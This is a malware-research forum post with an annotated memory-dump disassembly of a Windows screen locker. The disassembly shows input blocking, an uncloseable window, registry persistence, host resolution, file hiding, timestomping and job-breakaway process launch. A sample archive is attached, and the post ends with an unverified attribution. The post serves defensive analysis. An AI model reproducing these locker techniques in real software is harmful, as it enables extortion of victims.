 #23817  by unixfreaxjp
 Mon Sep 08, 2014 8:09 pm
I did not have enough time to analyze this deeper, so I am sharing what I have so far. Please help break it down further.
VT: https://www.virustotal.com/en/file/f509 ... 410205927/
Image of the three infections:
Memory dump :
// hash: 8028ee3776ac68bb5789575e5a904465
// Forensics of the locker's timer-driven window procedure (WM_TIMER dispatch at 0x402E8C).
// Env: WinVista | @unixfreaxjp - 20:53 Mon Sep  8 20:53:33 JST 2014

1. Window created (the window name and the class name below are the same long, random-looking string; it can be used to hunt for this build, but it may differ between builds)

   Window Name: +vgC>=_~!s_b0$>-TG)wIrh&8T*)Yg+t*5)Qwl%
   7zD{DVL3gRfDq~=(I(fNe}3{lSxJ[zD=mTN*}s^oj1%aOXo-6tKfE~64
   }T>B3lH+xdLOsOjLNUV&Porz[8s>m~[D6L_d<[7I[C#GP-3BZ_S]9TgV
   Siqr$_Z]gUEJ<~#%Lu(9[@Ix*(n_afsP^Q=k_AR5BgTeC *tfl%FT-e<
   ()HaZz^3&MEXw=l5xxNWAgW~*7wgPbZtOo3QJ]XI[ZCiZG<p Class N
   ame: +vgC>=_~!s_b0$>-TG)wIrh&8T*)Yg+t*5)Qwl%7zD{DVL3
   gRfDq~=(I(fNe}3{lSxJ[zD=mTN*}s^oj1%aOXo-6tKfE~64}T>B3lH+
   xdLOsOjLNUV&Porz[8s>m~[D6L_d<[7I[C#GP-3BZ_S]9TgVSiqr$_Z]
   gUEJ<~#%Lu(9[@Ix*(n_afsP^Q=k_AR5BgTeC *tfl%FT-e<()HaZz^3
   &MEXw=l5xxNWAgW~*7wgPbZtOo3QJ]XI[ZCiZG<p 
   HWND: 50116

2. Input blocked (BlockInput(TRUE), which goes through NtUserBlockInput): true | Mem Dmp Addr: 0x0403105 (the return address of the BlockInput call at 0x4030FF)

3. Malicious activity calls (memory dump)

    KillTimer.USER32 ref: 0x402EC3
    PostQuitMessage.USER32(00000000) ref: 0x402EDB
    DefWindowProcW.USER32 ref: 0x402EED
        Part of subcall function 0x40223C: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,000F013F,00000000,00000000) ref: 0x40226E
        Part of subcall function 0x40223C: RegSetValueExW.ADVAPI32(00000000,00000004,00000004) ref: 0x4022A5
        Part of subcall function 0x40223C: RegSetValueExW.ADVAPI32(00000000,00000004,00000004) ref: 0x4022CA
        Part of subcall function 0x40223C: RegFlushKey.ADVAPI32 ref: 0x4022CF
        Part of subcall function 0x40223C: RegCloseKey.ADVAPI32 ref: 0x4022D8
    SetTimer.USER32(00000002,00000001,00000000) ref: 0x402F0F
        Part of subcall function 0x40532D: IsBadWritePtr.KERNEL32(00000000,00000000) ref: 0x405344
    SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,0x410AA8) ref: 0x402F3A
    lstrcatW.KERNEL32(0x410AA8) ref: 0x402F57
        Part of subcall function 0x405B82: inet_addr.WSOCK32(0x410AA8,0x402FBA) ref: 0x405B87
        Part of subcall function 0x405B82: gethostbyname.WSOCK32 ref: 0x405B98
        Part of subcall function 0x402B25: memset.NTDLL(00000000) ref: 0x402B4C
        Part of subcall function 0x402B25: GetVersionExW.KERNEL32 ref: 0x402B65
        Part of subcall function 0x402B25: GlobalMemoryStatusEx.KERNEL32 ref: 0x402B7D
        Part of subcall function 0x402B25: GetSystemInfo.KERNEL32 ref: 0x402B87
        Part of subcall function 0x402B25: GetCurrentProcess.KERNEL32 ref: 0x402BB8
        Part of subcall function 0x4053FE: PathSkipRootW.SHLWAPI ref: 0x40541D
        Part of subcall function 0x4053FE: GetFileAttributesW.KERNEL32 ref: 0x405445
        Part of subcall function 0x4053FE: CreateDirectoryW.KERNEL32(00000000) ref: 0x405453
        Part of subcall function 0x405EBA: lstrcpynA.KERNEL32(00000032,0x410AA8,00000000) ref: 0x405F14
    GetModuleHandleW.KERNEL32 ref: 0x403022
    GetModuleFileNameW.KERNEL32(00000104) ref: 0x403029
    GetFileAttributesW.KERNEL32(0x410AA8) ref: 0x403030
    SetFileAttributesW.KERNEL32(0x410AA8) ref: 0x40303B
        Part of subcall function 0x404A47: CreateFileW.KERNEL32(80000000,00000001,00000000,00000003,02000000,00000000) ref: 0x404A99
        Part of subcall function 0x404A47: GetFileTime.KERNEL32(0x401E0B) ref: 0x404AAF
        Part of subcall function 0x404A47: CreateFileW.KERNEL32(00000100,00000000,00000000,00000003,02000000,00000000) ref: 0x404ACA
        Part of subcall function 0x404A47: SetFileTime.KERNEL32(0x401E0B) ref: 0x404AE0
    memset.NTDLL(00000000) ref: 0x403069
    CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,01000000,00000000,00000000) ref: 0x4030C6
    BlockInput.USER32(00000001) ref: 0x4030FF
    ShowWindow.USER32(00000005) ref: 0x40310A
    BeginPaint.USER32 ref: 0x40311D
    GetClientRect.USER32 ref: 0x403135
    FillRect.USER32(00000006) ref: 0x403143
    SetBkMode.GDI32(00000001) ref: 0x40314C
    lstrlenW.KERNEL32 ref: 0x403188
    DrawTextW.USER32 ref: 0x403194
        Part of subcall function 0x40A2EF: GetLastError.KERNEL32(0x403C58) ref: 0x40A2FA
        Part of subcall function 0x40A2EF: HeapFree.KERNEL32(00000000,0x403C58) ref: 0x40A32B
        Part of subcall function 0x40A2EF: SetLastError.KERNEL32(0x403C58) ref: 0x40A332
        Part of subcall function 0x40349C: GetHandleInformation.KERNEL32(00000000) ref: 0x4034B2
        Part of subcall function 0x40349C: CloseHandle.KERNEL32 ref: 0x4034C3
    EndPage.GDI32 ref: 0x4031A5
        Part of subcall function 0x403763: GetCurrentProcessId.KERNEL32 ref: 0x40378D
        Part of subcall function 0x403763: GetCurrentProcessId.KERNEL32 ref: 0x4037A8
    lstrlenW.KERNEL32 ref: 0x4031D8
        Part of subcall function 0x4013F2: SetErrorMode.KERNEL32(00008000) ref: 0x401400
        Part of subcall function 0x4013F2: GetSystemWindowsDirectoryW.KERNEL32(00000104) ref: 0x401412
        Part of subcall function 0x4013F2: lstrcatW.KERNEL32 ref: 0x40143F
    SetTimer.USER32(00000001,00000000) ref: 0x403207

4. Malicious Activity Disassembly (Memory Dump)

; ===========================================================================
; sub_402E8C - window procedure (WndProc) of the locker window.
; stdcall, 4 args (retn 10h): [ebp+08h]=hWnd  [ebp+0Ch]=uMsg
;                              [ebp+10h]=wParam [ebp+14h]=lParam
; ebx is zeroed at 0x402E9D and reused both as a NULL/0 argument and as the
; return value for every message handled here.  edi = 1 from 0x402F08 on.
;
; uMsg dispatch (dec/sub chain 0x402E9F..0x402EBB):
;   0x001 WM_CREATE  -> 0x4031B0  builds the lock text, arms a timer
;   0x002 WM_DESTROY -> 0x402EF5  return 0
;   0x00F WM_PAINT   -> 0x403115  draws the lock text
;   0x010 WM_CLOSE   -> 0x402EF5  return 0 WITHOUT DefWindowProc: close
;                                 requests are swallowed, the window stays up
;   0x113 WM_TIMER   -> 0x402EBD  KillTimer, then dispatch on timer id (wParam):
;            id 0 -> 0x4030FD  BlockInput(TRUE) + ShowWindow(SW_SHOW)   (lock)
;            id 1 -> 0x402F00  HKCU registry write, host resolution,
;                              hide/timestomp a file, CreateProcessW     (install)
;            id 2 -> 0x402EDA  PostQuitMessage(0)                        (exit)
;   other          -> 0x402EE1  DefWindowProcW
;
; NOTE(review): sub_403763(ptr, len, key, flag) precedes every string use and
; its result is later released via sub_40A2EF (HeapFree per the call trace);
; it looks like a string decryptor.  sub_40469C(buf, template, value) looks
; like a sprintf-style formatter.  Neither is confirmed from this dump; verify.
; ===========================================================================
0x402E8C   push ebp   ; prologue
0x402E8D   mov ebp, esp   
0x402E8F   and esp, FFFFFFF8h   ; 8-byte align the local frame
0x402E92   mov eax, dword ptr [ebp+0Ch]   ; eax = uMsg
0x402E95   sub esp, 00000274h   ; locals: path buffer, RECT/PAINTSTRUCT, STARTUPINFOW, PROCESS_INFORMATION
0x402E9B   push ebx   
0x402E9C   push esi   
0x402E9D   xor ebx, ebx   ; ebx = 0 for the rest of the function
0x402E9F   dec eax   
0x402EA0   push edi   
0x402EA1   je 0x4031B0h   target: 0x4031B0   ; uMsg == 1 (WM_CREATE)
0x402EA7   dec eax   
0x402EA8   je 0x402EF5h   target: 0x402EF5   ; uMsg == 2 (WM_DESTROY) -> return 0
0x402EAA   sub eax, 0Dh   
0x402EAD   je 0x403115h   target: 0x403115   ; uMsg == 0x0F (WM_PAINT)
0x402EB3   dec eax   
0x402EB4   je 0x402EF5h   target: 0x402EF5   ; uMsg == 0x10 (WM_CLOSE) -> return 0, no DefWindowProc: window cannot be closed
0x402EB6   sub eax, 00000103h   
0x402EBB   jne 0x402EE1h   target: 0x402EE1   ; uMsg != 0x113 (WM_TIMER) -> DefWindowProcW
0x402EBD   push dword ptr [ebp+10h]   ; nIDEvent = wParam
0x402EC0   push dword ptr [ebp+08h]   ; hWnd
0x402EC3   call dword ptr [0x40D200h]   KillTimer@USER32.DLL (Import, 2 Params)   ; every timer is one-shot
0x402EC9   mov eax, dword ptr [ebp+10h]   ; eax = timer id
0x402ECC   sub eax, ebx   xref: 0x40308B   ; ebx == 0: plain test of the id
0x402ECE   je 0x4030FDh   target: 0x4030FD   ; id 0 -> lock path
0x402ED4   dec eax   
0x402ED5   je 0x402F00h   target: 0x402F00   ; id 1 -> install path
0x402ED7   dec eax   
0x402ED8   jne 0x402EE1h   target: 0x402EE1   ; id > 2 -> DefWindowProcW
0x402EDA   push ebx   
0x402EDB   call dword ptr [0x40D22Ch]   PostQuitMessage@USER32.DLL (Import, 1 Params)   ; id 2: PostQuitMessage(0) ends the message loop
0x402EE1   push dword ptr [ebp+14h]   xref: 0x403127 0x4031AB 0x402EBB 0x403110 0x402F1C 0x402FF6 0x4030F8 0x402F80 0x402ED8   ; default: DefWindowProcW(hWnd, uMsg, wParam, lParam)
0x402EE4   push dword ptr [ebp+10h]   
0x402EE7   push dword ptr [ebp+0Ch]   
0x402EEA   push dword ptr [ebp+08h]   
0x402EED   call dword ptr [0x40D230h]   DefWindowProcW@USER32.DLL (Import, 4 Params)
0x402EF3   mov ebx, eax   ; <==== executed   ; return DefWindowProc's result
0x402EF5   pop edi   xref: 0x402EA8 0x402EB4   ; epilogue, common exit
0x402EF6   pop esi   
0x402EF7   mov eax, ebx   ; return value (0 for every message handled here)
0x402EF9   pop ebx   
0x402EFA   mov esp, ebp   
0x402EFC   pop ebp   
0x402EFD   retn 0010h   function end
; --- WM_TIMER id 1: install path --------------------------------------------
0x402F00   call 0x40223Ch   xref: 0x402ED5 target: 0x40223C   ; sub_40223C: RegCreateKeyExW(HKEY_CURRENT_USER=0x80000001,...), 2x RegSetValueExW, RegFlushKey, RegCloseKey (per call trace); key/value names not recovered here - presumably persistence, verify
0x402F05   push ebx   ; lpTimerFunc = NULL
0x402F06   xor edi, edi   
0x402F08   inc edi   ; edi = 1 (kept for the rest of this branch)
0x402F09   push edi   ; uElapse = 1 ms
0x402F0A   push 00000002h   ; nIDEvent = 2
0x402F0C   push dword ptr [ebp+08h]   
0x402F0F   call dword ptr [0x40D1F0h]   SetTimer@USER32.DLL (Import, 4 Params)   ; SetTimer(hWnd, 2, 1, NULL): timer 2 lands in PostQuitMessage above, i.e. this process quits right after the install work
0x402F15   call 0x402E34h   target: 0x402E34   ; sub_402E34: unknown check
0x402F1A   test al, al   
0x402F1C   je 0x402EE1h   target: 0x402EE1   ; returned 0 -> skip the install path
0x402F1E   push 00000208h   ; 0x208 bytes = MAX_PATH wide chars
0x402F23   mov esi, 0x410AA8h   ; esi = global path buffer (kept in esi for this branch)
0x402F28   push esi   
0x402F29   call 0x40532Dh   target: 0x40532D   ; sub_40532D(buf, 0x208): IsBadWritePtr per call trace
0x402F2E   pop ecx   ; cdecl cleanup (2 args)
0x402F2F   pop ecx   
0x402F30   test al, al   
0x402F32   je 0x402F40h   target: 0x402F40   ; buffer not usable -> skip SHGetFolderPathW
0x402F34   push esi   ; pszPath = 0x410AA8
0x402F35   push ebx   ; dwFlags = 0
0x402F36   push ebx   ; hToken = NULL
0x402F37   push 0000001Ah   ; CSIDL_APPDATA
0x402F39   push ebx   ; hwndOwner = NULL
0x402F3A   call dword ptr [0x40D1B8h]   SHGetFolderPathW@SHELL32.DLL (Import, 5 Params)   ; %APPDATA% -> 0x410AA8
0x402F40   push edi   xref: 0x402F32   ; flag = 1
0x402F41   push D2B37023h   ; key
0x402F46   push 0000001Bh   ; len = 0x1B chars
0x402F48   push 0x40DD2Ch   ; encrypted blob
0x402F4D   call 0x403763h   target: 0x403763   ; sub_403763 -> eax = decrypted string (see header note)
0x402F52   add esp, 10h   
0x402F55   push eax   
0x402F56   push esi   
0x402F57   call dword ptr [0x40D110h]   lstrcatW@KERNEL32.DLL (Import, 2 Params)   ; 0x410AA8 = %APPDATA% + decrypted name -> drop path
0x402F5D   call 0x401F83h   target: 0x401F83   ; sub_401F83: unknown test
0x402F62   test al, al   
0x402F64   je 0x402F85h   target: 0x402F85   ; 0 -> full install sequence below
0x402F66   lea edi, dword ptr [esp+10h]   ; edi -> 3-dword struct {0, 1 (byte), 0x402CD1}
0x402F6A   mov dword ptr [esp+10h], ebx   
0x402F6E   mov byte ptr [esp+14h], 00000001h   
0x402F73   mov dword ptr [esp+18h], 0x402CD1h   ; 0x402CD1 is a code address - presumably a callback, verify
0x402F7B   call 0x405EBAh   target: 0x405EBA   ; sub_405EBA: lstrcpynA per call trace; takes the struct via edi
0x402F80   jmp 0x402EE1h   target: 0x402EE1   ; done -> DefWindowProcW
0x402F85   push ebx   xref: 0x402F64   ; flag = 0
0x402F86   push 51A963ABh   
0x402F8B   push 00000002h   ; len = 2 chars
0x402F8D   push 0x40DD48h   
0x402F92   call 0x403763h   target: 0x403763   ; decrypt 2-char string (port?)
0x402F97   push ebx   
0x402F98   push 349518EAh   
0x402F9D   push 0000000Fh   ; len = 0xF chars
0x402F9F   push 0x40DD4Ch   
0x402FA4   mov dword ptr [esp+4Ch], eax   ; save first string
0x402FA8   call 0x403763h   target: 0x403763   ; decrypt 0xF-char string (host?)
0x402FAD   add esp, 20h   
0x402FB0   push dword ptr [esp+2Ch]   ; first (2-char) string
0x402FB4   push eax   ; second (0xF-char) string
0x402FB5   call 0x405B82h   target: 0x405B82   ; sub_405B82: inet_addr/gethostbyname per call trace - resolves the remote host (C2?); plaintext not recovered here
0x402FBA   pop ecx   
0x402FBB   push eax   
0x402FBC   call 0x402B25h   target: 0x402B25   ; sub_402B25: GetVersionExW, GlobalMemoryStatusEx, GetSystemInfo, GetCurrentProcess per call trace - host fingerprint, presumably for the resolved host; verify
0x402FC1   push esi   
0x402FC2   call 0x4053FEh   target: 0x4053FE   ; sub_4053FE(drop path): PathSkipRootW/GetFileAttributesW/CreateDirectoryW per call trace - creates the drop directory
0x402FC7   add esp, 0Ch   
0x402FCA   push esi   
0x402FCB   call 0x4023C5h   target: 0x4023C5   ; sub_4023C5(drop path): not in the call trace, unknown
0x402FD0   pop ecx   
0x402FD1   call 0x40295Ah   target: 0x40295A   ; sub_40295A: not in the call trace, unknown
0x402FD6   mov dword ptr [esp+10h], edi   ; same struct as 0x402F66, but first field = edi (1) instead of 0
0x402FDA   lea edi, dword ptr [esp+10h]   
0x402FDE   mov byte ptr [esp+14h], 00000001h   
0x402FE3   mov dword ptr [esp+18h], 0x402CD1h   
0x402FEB   call 0x405EBAh   target: 0x405EBA   ; sub_405EBA again
0x402FF0   cmp dword ptr [0x410CB4h], ebx0x00000000   ; rendered line is garbled ("ebx" + annotation): global 0x410CB4 == NULL? It is formatted into the command line at 0x4030A5 and freed at 0x4030F2, so it looks like a heap buffer - verify
0x402FF6   je 0x402EE1h   target: 0x402EE1   ; nothing to run -> done
0x402FFC   call 0x401E15h   target: 0x401E15   ; sub_401E15: unknown
0x403001   push 00000001h   
0x403003   push 2B7588E7h   
0x403008   push 0000000Ch   ; len = 0xC chars
0x40300A   push 0x40DD5Ch   
0x40300F   call 0x403763h   target: 0x403763   ; decrypt module name for GetModuleHandleW
0x403014   add esp, 10h   
0x403017   push 00000104h   ; nSize = MAX_PATH
0x40301C   lea ecx, dword ptr [esp+7Ch]   ; lpFilename = local buffer
0x403020   push ecx   
0x403021   push eax   
0x403022   call dword ptr [0x40D080h]   GetModuleHandleW@KERNEL32.DLL (Import, 1 Params)   ; GetModuleHandleW(decrypted name)
0x403028   push eax   
0x403029   call dword ptr [0x40D108h]   GetModuleFileNameW@KERNEL32.DLL (Import, Unknown Params)   ; GetModuleFileNameW(hModule, buf, 0x104): full path of that module ("Unknown Params" is a resolver gap; 3 args are pushed)
0x40302F   push esi   
0x403030   call dword ptr [0x40D07Ch]   GetFileAttributesW@KERNEL32.DLL (Import, 1 Params)   ; current attributes of the drop path
0x403036   or eax, 06h   ; | FILE_ATTRIBUTE_HIDDEN (2) | FILE_ATTRIBUTE_SYSTEM (4)
0x403039   push eax   
0x40303A   push esi   
0x40303B   call dword ptr [0x40D08Ch]   SetFileAttributesW@KERNEL32.DLL (Import, 2 Params)   ; hide the dropped file from default Explorer views
0x403041   lea eax, dword ptr [esp+78h]   ; module path buffer from 0x40301C
0x403045   push esi   ; drop path
0x403046   push eax   
0x403047   call 0x404A47h   target: 0x404A47   ; sub_404A47(modulePath, dropPath): CreateFileW(GENERIC_READ)/GetFileTime then CreateFileW(FILE_WRITE_ATTRIBUTES=0x100)/SetFileTime per call trace, both with FILE_FLAG_BACKUP_SEMANTICS (0x02000000) - copies file times from one file to the other (timestomping); direction not determined here
0x40304C   push dword ptr [0x410CB4h]   
0x403052   call 0x4023E6h   target: 0x4023E6   ; sub_4023E6([0x410CB4]): not in the call trace, unknown
0x403057   add esp, 0Ch   
0x40305A   push esi   
0x40305B   call 0x4023A4h   target: 0x4023A4   ; sub_4023A4(drop path): not in the call trace, unknown
0x403060   pop ecx   
0x403061   push 00000x40h   ; rendered line is garbled; consistent with 00000040h = sizeof(STARTUPINFOW) (0x44) minus the cb field set at 0x40308B
0x403063   lea eax, dword ptr [esp+38h]   ; STARTUPINFOW body (after cb)
0x403067   push ebx   
0x403068   push eax   
0x403069   call 0x40A4E2h   memset@NTDLL.DLL (Import, 2 Params) target: 0x40A4E2   ; memset(&si.lpReserved, 0, 0x40)
0x40306E   add esp, 0Ch   
0x403071   mov dword ptr [esp+1Ch], ebx   ; PROCESS_INFORMATION at esp+1Ch: hProcess = 0
0x403075   xor eax, eax   
0x403077   lea edi, dword ptr [esp+20h]   
0x40307B   stosd    ; hThread = 0
0x40307C   push 00000001h   
0x40307E   push 9F12C8E3h   
0x403083   stosd    ; dwProcessId = 0
0x403084   push 00000004h   ; len = 4 chars
0x403086   push 0x40DD6Ch   
0x40308B   mov dword ptr [esp+40h], 00000044h   ASCII "D" (Chunk)   ; si.cb = sizeof(STARTUPINFOW) = 0x44 (the "ASCII" tag is a tool artifact)
0x403093   stosd    ; dwThreadId = 0
0x403094   call 0x403763h   target: 0x403763   ; decrypt 4-char command-line template
0x403099   push dword ptr [0x410CB4h]   ; value to format in
0x40309F   push eax   ; template
0x4030A0   lea eax, dword ptr [esp+24h]   ; output buffer (becomes lpCommandLine)
0x4030A4   push eax   
0x4030A5   call 0x40469Ch   target: 0x40469C   ; sub_40469C: sprintf-style formatter (see header note)
0x4030AA   add esp, 1Ch   
0x4030AD   lea eax, dword ptr [esp+1Ch]   
0x4030B1   push eax   ; lpProcessInformation
0x4030B2   lea eax, dword ptr [esp+34h]   
0x4030B6   push eax   ; lpStartupInfo
0x4030B7   push ebx   ; lpCurrentDirectory = NULL
0x4030B8   push ebx   ; lpEnvironment = NULL
0x4030B9   push 01000000h   ; dwCreationFlags = CREATE_BREAKAWAY_FROM_JOB: the child leaves any job object of this process (defeats job-based containment; a kill-on-close job will not take the child down when this process quits via timer 2)
0x4030BE   push ebx   ; bInheritHandles = FALSE
0x4030BF   push ebx   ; lpThreadAttributes = NULL
0x4030C0   push ebx   ; lpProcessAttributes = NULL
0x4030C1   push dword ptr [esp+2Ch]   ; lpCommandLine = formatted buffer
0x4030C5   push ebx   ; lpApplicationName = NULL
0x4030C6   call dword ptr [0x40D05Ch]   CreateProcessW@KERNEL32.DLL (Import, 10 Params)
0x4030CC   test eax, eax   
0x4030CE   je 0x4030E2h   target: 0x4030E2   ; failed -> skip handle cleanup
0x4030D0   mov esi, dword ptr [esp+20h]   ; pi.hThread
0x4030D4   call 0x40349Ch   target: 0x40349C   ; sub_40349C(esi): GetHandleInformation + CloseHandle per call trace
0x4030D9   mov esi, dword ptr [esp+1Ch]   ; pi.hProcess
0x4030DD   call 0x40349Ch   target: 0x40349C   ; close it too
0x4030E2   push dword ptr [esp+0Ch]   xref: 0x4030CE   ; command-line buffer
0x4030E6   call 0x40A2EFh   target: 0x40A2EF   ; sub_40A2EF: HeapFree per call trace
0x4030EB   pop ecx   
0x4030EC   push dword ptr [0x410CB4h]   
0x4030F2   call 0x40A2EFh   target: 0x40A2EF   ; free the global buffer as well
0x4030F7   pop ecx   
0x4030F8   jmp 0x402EE1h   target: 0x402EE1   ; -> DefWindowProcW
; --- WM_TIMER id 0: lock path (the path marked "executed" in this dump) ------
0x4030FD   push 00000001h   xref: 0x402ECE   ; fBlockIt = TRUE
0x4030FF   call dword ptr [0x40D210h]   BlockInput@USER32.DLL (Import, 1 Params)   ; blocks keyboard/mouse input for other threads; per the API docs only the blocking thread can re-enable it
0x403105   push 00000005h   ; <==== executed   ; SW_SHOW
0x403107   push dword ptr [ebp+08h]   
0x40310A   call dword ptr [0x40D214h]   ShowWindow@USER32.DLL (Import, 2 Params)   ; ShowWindow(hWnd, SW_SHOW): the lock window appears
0x403110   jmp 0x402EE1h   target: 0x402EE1 ; <==== executed   ; -> DefWindowProcW
; --- WM_PAINT --------------------------------------------------------------
0x403115   lea eax, dword ptr [esp+30h]   xref: 0x402EAD   ; &PAINTSTRUCT
0x403119   push eax   
0x40311A   push dword ptr [ebp+08h]   
0x40311D   call dword ptr [0x40D208h]   BeginPaint@USER32.DLL (Import, 2 Params)
0x403123   mov esi, eax   ; esi = hdc
0x403125   cmp esi, ebx   
0x403127   je 0x402EE1h   target: 0x402EE1   ; no DC -> DefWindowProcW
0x40312D   lea eax, dword ptr [esp+1Ch]   ; &RECT
0x403131   push eax   
0x403132   push dword ptr [ebp+08h]   
0x403135   call dword ptr [0x40D204h]   GetClientRect@USER32.DLL (Import, 2 Params)
0x40313B   push 00000006h   ; hbr = (HBRUSH)(COLOR_WINDOW + 1)
0x40313D   lea eax, dword ptr [esp+20h]   ; same RECT
0x403141   push eax   
0x403142   push esi   
0x403143   call dword ptr [0x40D1F8h]   FillRect@USER32.DLL (Import, 3 Params)   ; clear the client area
0x403149   push 00000001h   ; TRANSPARENT
0x40314B   push esi   
0x40314C   call dword ptr [0x40D048h]   SetBkMode@GDI32.DLL (Import, 2 Params)
0x403152   push 00000001h   
0x403154   push 8182F0FBh   
0x403159   push 00000056h   ; len = 0x56 chars
0x40315B   push 0x40DD78h   
0x403160   call 0x403763h   target: 0x403763   ; decrypt the on-screen text template
0x403165   push dword ptr [0x410CB0h]   ; text built in WM_CREATE (0x4031EB)
0x40316B   push eax   
0x40316C   lea eax, dword ptr [esp+24h]   
0x403170   push eax   
0x403171   call 0x40469Ch   target: 0x40469C   ; format -> eax = text (0 on failure)
0x403176   add esp, 1Ch   
0x403179   test eax, eax   
0x40317B   je 0x4031A4h   target: 0x4031A4   ; nothing to draw
0x40317D   push 00000025h   ; uFormat = DT_CENTER | DT_VCENTER | DT_SINGLELINE
0x40317F   lea eax, dword ptr [esp+20h]   ; &RECT
0x403183   push eax   
0x403184   push dword ptr [esp+14h]   ; text
0x403188   call dword ptr [0x40D0B8h]   lstrlenW@KERNEL32.DLL (Import, 1 Params)
0x40318E   push eax   ; cchText
0x40318F   push dword ptr [esp+18h]   ; text
0x403193   push esi   ; hdc
0x403194   call dword ptr [0x40D1FCh]   DrawTextW@USER32.DLL (Import, 5 Params)   ; centered single-line lock message
0x40319A   push dword ptr [esp+0Ch]   
0x40319E   call 0x40A2EFh   target: 0x40A2EF   ; free the formatted text
0x4031A3   pop ecx   
0x4031A4   push esi   xref: 0x40317B
0x4031A5   call dword ptr [0x40D044h]   EndPage@GDI32.DLL (Import, 1 Params)   ; NOTE(review): a BeginPaint handler should end with EndPaint (USER32); the EndPage.GDI32 label looks like a resolver mislabel - verify the import at 0x40D044
0x4031AB   jmp 0x402EE1h   target: 0x402EE1   ; -> DefWindowProcW
; --- WM_CREATE -------------------------------------------------------------
0x4031B0   lea eax, dword ptr [esp+78h]   xref: 0x402EA1   ; output buffer for sub_4036EA
0x4031B4   push eax   
0x4031B5   push 00000001h   
0x4031B7   push E17754ACh   
0x4031BC   push 0000000Fh   ; len = 0xF chars
0x4031BE   push 0x40DD1Ch   
0x4031C3   call 0x403763h   target: 0x403763   ; decrypt
0x4031C8   add esp, 10h   
0x4031CB   push eax   
0x4031CC   call 0x4036EAh   target: 0x4036EA   ; sub_4036EA(decrypted, buf): unknown, fills the buffer
0x4031D1   pop ecx   executed
0x4031D2   pop ecx   
0x4031D3   lea eax, dword ptr [esp+78h]   
0x4031D7   push eax   
0x4031D8   call dword ptr [0x40D0B8h]   lstrlenW@KERNEL32.DLL (Import, 1 Params)
0x4031DE   mov edi, eax   
0x4031E0   add edi, edi   ; edi = byte length of the wide string
0x4031E2   lea eax, dword ptr [esp+78h]   ; eax = buf (register argument)
0x4031E6   call 0x405BC4h   target: 0x405BC4   ; sub_405BC4(eax=buf, edi=len): unknown, returns the text pointer
0x4031EB   mov dword ptr [0x410CB0h], eax   ; text consumed by WM_PAINT
0x4031F0   call 0x4013F2h   target: 0x4013F2   ; sub_4013F2: SetErrorMode(SEM_NOOPENFILEERRORBOX=0x8000), GetSystemWindowsDirectoryW, lstrcatW per call trace; returns a value used below
0x4031F5   sub dword ptr [0x4109DCh], eax   executed   ; [0x4109DC] -= eax
0x4031FB   push ebx   ; lpTimerFunc = NULL
0x4031FC   push 00000001h   ; uElapse = 1 ms
0x4031FE   push dword ptr [0x4109DCh]   ; nIDEvent = the computed value: it selects the WM_TIMER branch (0 lock / 1 install / 2 quit); the lock path being marked "executed" is consistent with 0 in this run
0x403204   push dword ptr [ebp+08h]   
0x403207   call dword ptr [0x40D1F0h]   SetTimer@USER32.DLL (Import, 4 Params)
0x40320D   jmp 0x402EF5h   swap point    ; return 0 (ebx)
Attachments
7z archive, password: infected
The actor behind this is a known carder who ripped off fellow crooks, ended up on their "wanted" lists, and is now distributing this locker.
